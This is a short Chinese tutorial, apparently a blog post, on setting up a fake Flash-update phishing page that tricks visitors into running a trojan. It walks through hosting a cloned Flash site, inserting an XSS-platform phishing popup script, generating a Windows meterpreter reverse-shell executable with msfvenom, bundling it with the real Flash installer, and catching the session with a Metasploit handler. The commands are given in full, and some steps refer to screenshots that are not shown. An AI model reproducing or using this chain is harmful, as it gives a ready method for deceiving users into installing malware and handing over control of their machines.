一.本机下载小皮面板 开启环境
二.下载flash源文件
下载地址:crowsec/crowsec_FakeFlash at master · crow821/crowsec · GitHub
三.下载完成把网站部署在phpstudy www根目录下
四 新建一个1.js文件 然后在xss平台找到flash弹窗钓鱼 然后查看他的源代码 复制到新建的1.js里面
然后在1.js里修改成伪造网站的ip
五.然后在kali里使用msf命令生成shell木马 如下图
六.把shell拖到自己主机桌面 或者根目录下
七.把flash 安装包跟shell.exe一起压缩 
这个样子
八 模拟受害者的流程 最终获取到受害者⽹站控制权
Flash 官⽹下载 https://www.flash.cn/download-wins MSF ⽣成 Payloadmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=44
44 -f exe > shell.exemsfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run
当我们安装 上面解压好的那个flash的时候 这里就会显示 
这就是主机 然后一个flash弹窗木马就生成了
